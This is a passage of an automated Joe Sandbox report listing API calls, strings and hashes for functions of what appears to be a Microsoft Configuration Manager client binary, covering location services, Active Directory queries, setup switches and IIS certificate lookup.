                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064455B
                                                                                            • Part of subcall function 0060CD0A: __EH_prolog3_catch.LIBCMT ref: 0060CD11
                                                                                            • Part of subcall function 0060CD0A: GetCurrentThreadId.KERNEL32 ref: 0060CD6D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006445B1
                                                                                            • Part of subcall function 0060C8DD: __EH_prolog3_catch.LIBCMT ref: 0060C8E4
                                                                                            • Part of subcall function 0060C8DD: GetCurrentThreadId.KERNEL32 ref: 0060C940
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006445FE
                                                                                          • GetSystemTime.KERNEL32(00000000,InInternet,0000000B,00000001,InInternet,00000001,ClientInfo=@,00000000,00000000,root\ccm,00000001,00000000,00000000,CCM::LocationServices::LSGetInternetMode,000000AC,0063CB01), ref: 00644614
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064465A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006446A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006444D3
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 0064376C: __EH_prolog3_catch_GS.LIBCMT ref: 00643776
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catchH_prolog3_catch_$SystemTime
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetInternetMode$ClientInfo=@$InInternet$InInternet$InInternet$InInternet$InternetModeLastUpdateTime$LSGetInternetMode$LSGetInternetMode: In Internet$LSGetInternetMode: In Intranet$LSGetInternetMode: Unknown$root\ccm$spNS.Get(L"ClientInfo=@", &spObject)$spNS.Open(L"root\\ccm")$spNS.PutInstance(spObject)$spObject.SetBoolean(L"InInternet", false)$spObject.SetBoolean(L"InInternet", true)$spObject.SetDateTime(L"InternetModeLastUpdateTime", stNow)$spObject.SetNull(L"InInternet", CIM_BOOLEAN)
                                                                                          • API String ID: 2877923578-1579399194
                                                                                          • Opcode ID: 534d64c788704968708c4027ba9586610c619c9900b4e936949e6ddde994a595
                                                                                          • Instruction ID: 112e88faa21f05e6c4d15dc145ae691c97f5dd936c92c2f78536088467a410ea
                                                                                          • Opcode Fuzzy Hash: 534d64c788704968708c4027ba9586610c619c9900b4e936949e6ddde994a595
                                                                                          • Instruction Fuzzy Hash: 3CB1D970940368AADF20EFA0DD4ABEE7E66FF52B04F144049F505AB382DB785A85CB51
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00648255
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0064376C: __EH_prolog3_catch_GS.LIBCMT ref: 00643776
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064839E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00648495
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00648509
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00648622
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00648684
                                                                                            • Part of subcall function 00643E06: __EH_prolog3_catch_GS.LIBCMT ref: 00643E0D
                                                                                            • Part of subcall function 00643E06: GetCurrentThreadId.KERNEL32 ref: 00643EA4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006486FF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00648879
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064867F
                                                                                          • LSGetSiteVersionFromAD : Attempting to query AD for MPs for site '%s', xrefs: 00648430
                                                                                          • LSGetSiteVersionFromAD : Successfully retrieved version '%s' for site '%s', xrefs: 00648775
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064861D
                                                                                          • ..\lsad.cpp, xrefs: 00648885
                                                                                          • msSMSCapabilities, xrefs: 00648298, 006485BC
                                                                                          • !sSiteCode.empty(), xrefs: 00648394
                                                                                          • ..\lsad.cpp, xrefs: 0064862E
                                                                                          • ..\lsad.cpp, xrefs: 006483AA
                                                                                          • ..\lsad.cpp, xrefs: 006484F9
                                                                                          • Version, xrefs: 0064869A
                                                                                          • ..\lsad.cpp, xrefs: 00648690
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00648504
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00648399
                                                                                          • GetStringFromColumn(&col, sCliOpSetting), xrefs: 00648618
                                                                                          • ..\lsad.cpp, xrefs: 00648485
                                                                                          • LSPerformADQuery( spCont, spSearch, hSearch, pszMPAttr, dwMPCount, sMPSearchFilter ), xrefs: 0064848B
                                                                                          • ..\lsad.cpp, xrefs: 00648612
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006486FA
                                                                                          • hr = spSearch->GetNextRow(hSearch), xrefs: 0064886F
                                                                                          • ..\lsad.cpp, xrefs: 00648869
                                                                                          • LSGetSiteVersionFromAD : Failed to retrieve version for the site '%s' (0x%08x), xrefs: 006488FE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00648874
                                                                                          • ..\lsad.cpp, xrefs: 00648515
                                                                                          • LSGetElementTextFromXML( sCliOpSetting, L"Version", sSiteVersion), xrefs: 006486F5
                                                                                          • ..\lsad.cpp, xrefs: 0064870B
                                                                                          • LSGetSiteVersionFromAD, xrefs: 00648360
                                                                                          • LSGetSiteVersionFromAD : No MPs found for the site '%s'. Assuming SMS 2003 Site., xrefs: 0064854B
                                                                                          • ..\lsad.cpp, xrefs: 006484A1
                                                                                          • ..\lsad.cpp, xrefs: 00648674
                                                                                          • ..\lsad.cpp, xrefs: 0064838E
                                                                                          • hr = spSearch->GetFirstRow(hSearch), xrefs: 006484FF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00648490
                                                                                          • ..\lsad.cpp, xrefs: 006486EF
                                                                                          • (&(ObjectCategory=mSSMSManagementPoint)(mSSMSSiteCode=, xrefs: 006483D0
                                                                                          • LSGetCapabilitiesAndADMembershipFromCliOpSettings(sCliOpSetting, sCapabilities, sNull, sNull), xrefs: 0064867A
                                                                                          • CCM::LocationServices::LSGetSiteVersionFromAD, xrefs: 006482D3
                                                                                          • distinguishedName, xrefs: 0064828E, 00648450
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3
                                                                                          • String ID: !sSiteCode.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(&(ObjectCategory=mSSMSManagementPoint)(mSSMSSiteCode=$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetSiteVersionFromAD$GetStringFromColumn(&col, sCliOpSetting)$LSGetCapabilitiesAndADMembershipFromCliOpSettings(sCliOpSetting, sCapabilities, sNull, sNull)$LSGetElementTextFromXML( sCliOpSetting, L"Version", sSiteVersion)$LSGetSiteVersionFromAD$LSGetSiteVersionFromAD : Attempting to query AD for MPs for site '%s'$LSGetSiteVersionFromAD : Failed to retrieve version for the site '%s' (0x%08x)$LSGetSiteVersionFromAD : No MPs found for the site '%s'. Assuming SMS 2003 Site.$LSGetSiteVersionFromAD : Successfully retrieved version '%s' for site '%s'$LSPerformADQuery( spCont, spSearch, hSearch, pszMPAttr, dwMPCount, sMPSearchFilter )$Version$distinguishedName$hr = spSearch->GetFirstRow(hSearch)$hr = spSearch->GetNextRow(hSearch)$msSMSCapabilities
                                                                                          • API String ID: 133077043-3276868726
                                                                                          • Opcode ID: af8e5bb15ec0a33ae65b26b15d1643ccc3c3444152ee67ec2277af0c2414ecf5
                                                                                          • Instruction ID: aa416c2f892e810fe39289c9dc73ddbf3152b7eebedb33051dcaa68ea5c66970
                                                                                          • Opcode Fuzzy Hash: af8e5bb15ec0a33ae65b26b15d1643ccc3c3444152ee67ec2277af0c2414ecf5
                                                                                          • Instruction Fuzzy Hash: 9D028D70D04219AEDF20EBA4CD49BEDBBBABF40714F144199E608B7282DB745A44CFA1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A2357
                                                                                            • Part of subcall function 005F53EA: __EH_prolog3_catch_GS.LIBCMT ref: 005F53F1
                                                                                            • Part of subcall function 005F53EA: GetCurrentThreadId.KERNEL32 ref: 005F54B1
                                                                                            • Part of subcall function 005F53EA: GetCurrentThreadId.KERNEL32 ref: 005F556D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A24D7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A255F
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005BA4EE: __EH_prolog3_GS.LIBCMT ref: 005BA4F8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$/PerformUpgrade$/UpgradePackageVersion:$/UpgradeWinTask$/autoupgrade$/forceinstall$/forcereboot$/mp:$/native$/native:$/noservice$/runservice$/service$/source:$/status:$/upgradetolatest$/usepkicert$/useronly$CCMCERTID$CCMCERTISSUERS$CCMCERTSEL$CCMCERTSTORE$CCMFIRSTCERT$CCMHOSTNAME$CCMHTTPPORT$CCMHTTPSCERTNAME$CCMHTTPSPORT$CSetupEnvironment::ParseAutoUpgradeCommandLine$Ccmsetup is launched by Windows Task Scheduler for client upgrade.$Ccmsetup is launched by the local policy for performing upgrade at the service window.$CheckCCMSupportedEmbedded(bIsEmbedded, bIsSupported)$FSP$IsClientInstalled(bInstalled, bV4ClientInstalled)$SMSMP$SMSSITECODE$SMSSLP$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp
                                                                                          • API String ID: 2516659302-3445044751
                                                                                          • Opcode ID: 28f50586e297705c7cbd3fdb74950759f059dcaf99cabf07966f18389883b671
                                                                                          • Instruction ID: 0a1d76ab577e7b6277d6abb7cec6b79da702530c072b7fb5c055f28e4cb5c94d
                                                                                          • Opcode Fuzzy Hash: 28f50586e297705c7cbd3fdb74950759f059dcaf99cabf07966f18389883b671
                                                                                          • Instruction Fuzzy Hash: D3B1D270A852997ADF24A7A48D8FFFE6E5AEF43754F14804CF104AB5C3CAE41A44C762
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A439E
                                                                                            • Part of subcall function 00576835: __EH_prolog3.LIBCMT ref: 0057683C
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005FBD05: __EH_prolog3_catch_GS.LIBCMT ref: 005FBD0F
                                                                                            • Part of subcall function 005FBD05: GetVersionExW.KERNEL32(?), ref: 005FBD60
                                                                                            • Part of subcall function 005FBD05: GetLastError.KERNEL32 ref: 005FBD6A
                                                                                            • Part of subcall function 005FBD05: GetCurrentThreadId.KERNEL32 ref: 005FBD9D
                                                                                            • Part of subcall function 005F9F49: __EH_prolog3_catch_GS.LIBCMT ref: 005F9F53
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4484
                                                                                            • Part of subcall function 005AA98E: SysFreeString.OLEAUT32(00000000), ref: 005AA9BA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A44E7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4537
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4585
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4604
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4659
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3$ErrorFreeLastStringVersion
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$ALL$CcmGetOSMajorMinorVersion(sOSVersion)$CcmSetupManifest::DetermineSkipApplicability$Check skip platform: Is Embedded.$Check skip platform: Is ServerCore.$CheckCCMSupportedEmbedded(bIsEmbedded, bIsSupported)$H&l$OS check '%s' return positive.$OS=$Skip check positive. Will ignore the pre-req on this machine.$[:Z$d}l$embedded$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$sItemValue.tokenize(c_szCommaDelimiter, arrValues)$servercore$spApplicability->get_childNodes(&spSkipList)$spSkip.getText(sItemValue)$spSkipList->get_length(&lLength)
                                                                                          • API String ID: 3123069108-443779355
                                                                                          • Opcode ID: f5c6fe89359b492d61868153fbac0fe023fdb66b9cd57fda3a381e93969aa308
                                                                                          • Instruction ID: 6d66c45eb4487fca4ee54879273250a569630199150f9e2dc33f790b24662fd4
                                                                                          • Opcode Fuzzy Hash: f5c6fe89359b492d61868153fbac0fe023fdb66b9cd57fda3a381e93969aa308
                                                                                          • Instruction Fuzzy Hash: 3AE19970D04359AEDF20EFA4C949BEDBFB5BF56304F144099E548AB282C7B45A08CF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0063D074
                                                                                            • Part of subcall function 005F094C: __EH_prolog3_catch_GS.LIBCMT ref: 005F0956
                                                                                            • Part of subcall function 005F094C: GetCurrentThreadId.KERNEL32 ref: 005F09AC
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D16C
                                                                                            • Part of subcall function 005F433E: __EH_prolog3_catch.LIBCMT ref: 005F4345
                                                                                            • Part of subcall function 005F433E: GetCurrentThreadId.KERNEL32 ref: 005F439F
                                                                                            • Part of subcall function 005F433E: CoTaskMemFree.OLE32(00000000,00000000,?,?), ref: 005F452E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D1CD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D20F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D258
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D2B8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D321
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D376
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D3CE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$FreeH_prolog3H_prolog3_catchTask
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$CCM::LocationServices::CcmGetProxyMPFromWMIEx$CCM::LocationServices::LSGetProxyMPFromWMI( sProxyMP, sProtocol, dwVersion, sCapablities)$LocationServices$pdwVersion!=0$ppszCapabilities!=0$ppszProtocol!=0$ppszProxyMP!=0$sCapablities.CoAllocString(&csCapablities)$sProtocol.CoAllocString(&csProtocol)$sProxyMP.CoAllocString(&csProxyMP)
                                                                                          • API String ID: 3364196837-3987164625
                                                                                          • Opcode ID: 30c226c8e30b96815d58e0c956dfa7c30114f6254ae02ee86c1751b301b1d611
                                                                                          • Instruction ID: b7a41b294f7c5e4290e9866c929e34c961adba4fabbfcb3d12d6dfa4a62910ab
                                                                                          • Opcode Fuzzy Hash: 30c226c8e30b96815d58e0c956dfa7c30114f6254ae02ee86c1751b301b1d611
                                                                                          • Instruction Fuzzy Hash: B8C1A070D84358EADB10DBA4CD09BEDBBBABF51704F108189E514AB3C2CBB51A85CB91
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0065801C
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006580A4
                                                                                            • Part of subcall function 0060F930: __EH_prolog3_catch.LIBCMT ref: 0060F937
                                                                                            • Part of subcall function 0060F930: GetCurrentThreadId.KERNEL32 ref: 0060F987
                                                                                          • CertFreeCertificateContext.CRYPT32(?,CCM::Authentication::CCMRetrieveCertificateContextFromIIS,00000178,00656AD7,0093A4B0,0093A540,000000FF,0093A540,000000FF,00000000,CCM::Authentication::CCMGetCurrentServerSigningCertificateContext,00000010,00657D1B,?,00000000,CCM::Authentication::CCMRetrieveCertificateContext), ref: 00658124
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065816C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006581C9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065822C
                                                                                          • CertOpenStore.CRYPT32(0000000A,00000000,00000000,0002C000,?), ref: 006582B8
                                                                                          • GetLastError.KERNEL32 ref: 006582CE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00658306
                                                                                          • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,00010000,?,00000000), ref: 00658398
                                                                                          • GetLastError.KERNEL32 ref: 006583AE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006583E6
                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00658482
                                                                                          • CertCloseStore.CRYPT32(00000000,00000000), ref: 0065848E
                                                                                          Strings
                                                                                          • ..\ccmgencert.cpp, xrefs: 006581D5
                                                                                          • CCM::Utility::Security::LookupIISCertStore(sCertStore), xrefs: 00658162
                                                                                          • ..\ccmgencert.cpp, xrefs: 006582F6
                                                                                          • ..\ccmgencert.cpp, xrefs: 006581B9
                                                                                          • 0 != ppCertContext, xrefs: 0065809A
                                                                                          • ..\ccmgencert.cpp, xrefs: 00658238
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065809F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00658227
                                                                                          • CCM::Authentication::CCMRetrieveCertificateContextFromIIS, xrefs: 00658056
                                                                                          • hCertStoreOfIisCert, xrefs: 006582FC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006581C4
                                                                                          • ..\ccmgencert.cpp, xrefs: 006580B0
                                                                                          • MP signing function CCMRetrieveCertificateContextFromIIS being called in absence of a site role., xrefs: 0065810A
                                                                                          • ..\ccmgencert.cpp, xrefs: 00658178
                                                                                          • Couldn't open cert store %s returned from IIS., xrefs: 00658353
                                                                                          • CCM::Utility::Security::LookupIISCertHash(&cbHash, pbHash), xrefs: 006581BF
                                                                                          • ..\ccmgencert.cpp, xrefs: 006583D6
                                                                                          • ..\ccmgencert.cpp, xrefs: 006583F2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006583E1
                                                                                          • ..\ccmgencert.cpp, xrefs: 0065815C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00658167
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00658301
                                                                                          • ..\ccmgencert.cpp, xrefs: 00658312
                                                                                          • Couldn't locate IIS certificate., xrefs: 0065841E
                                                                                          • Bytes2ComString(pbHash, cbHash, &pszCertHash), xrefs: 00658222
                                                                                          • Looking for cert with SHA1 hash %s in cert store %s., xrefs: 00658286
                                                                                          • ..\ccmgencert.cpp, xrefs: 00658094
                                                                                          • ..\ccmgencert.cpp, xrefs: 0065821C
                                                                                          • *ppCertContext, xrefs: 006583DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Cert$Store$CertificateErrorFreeLast$CloseContextFindH_prolog3H_prolog3_catchH_prolog3_catch_OpenTask
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006432A3
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00609791: __EH_prolog3.LIBCMT ref: 00609798
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00643394
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006433EF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064343E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00643561
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006435F0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00643671
                                                                                            • Part of subcall function 00640521: __EH_prolog3_catch_GS.LIBCMT ref: 00640528
                                                                                            • Part of subcall function 00640521: GetCurrentThreadId.KERNEL32 ref: 00640638
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006434E2
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 0060A27B: __EH_prolog3.LIBCMT ref: 0060A282
                                                                                          Strings
                                                                                          • Failed to retrieve an FSP from AD., xrefs: 006436B1
                                                                                          • ..\lsad.cpp, xrefs: 00643661
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00643439
                                                                                          • ..\lsad.cpp, xrefs: 0064342E
                                                                                          • g_oMPsCache.GetClientOperationalSettings( sSiteCode, sOperationalXML ), xrefs: 0064338A
                                                                                          • Received client operational settings: %s., xrefs: 00643482
                                                                                          • parentElement.HasChild(sVersionTag), xrefs: 00643557
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006434DD
                                                                                          • true == doc.LoadFromString(sOperationalXML), xrefs: 00643434
                                                                                          • !sSiteVersion.empty(), xrefs: 006435E6
                                                                                          • Version, xrefs: 006434A3
                                                                                          • ..\lsad.cpp, xrefs: 006434EE
                                                                                          • ..\lsad.cpp, xrefs: 006435FC
                                                                                          • Failed to retrieve an CLIENT.MSI settings from AD., xrefs: 006436FD
                                                                                          • ..\lsad.cpp, xrefs: 006435E0
                                                                                          • Retrieving client operational settings from AD., xrefs: 00643345
                                                                                          • parentElement, xrefs: 006434D8
                                                                                          • ..\lsad.cpp, xrefs: 0064356D
                                                                                          • ..\lsad.cpp, xrefs: 006433F7
                                                                                          • CCM::LocationServices::LSGetClientDeploymentInfoFromAD, xrefs: 006432E7
                                                                                          • ..\lsad.cpp, xrefs: 00643679
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006433EA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006435EB
                                                                                          • ..\lsad.cpp, xrefs: 0064339C
                                                                                          • ..\lsad.cpp, xrefs: 006434D2
                                                                                          • false == sOperationalXML.empty(), xrefs: 006433E5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064355C
                                                                                          • ..\lsad.cpp, xrefs: 00643446
                                                                                          • ConstructSecuritySettingsFromClientOperationalSettings( doc, oSecurityMode ), xrefs: 00643667
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064338F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064366C
                                                                                          • ..\lsad.cpp, xrefs: 00643384
                                                                                          • ..\lsad.cpp, xrefs: 00643551
                                                                                          • ..\lsad.cpp, xrefs: 006433DF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B535F
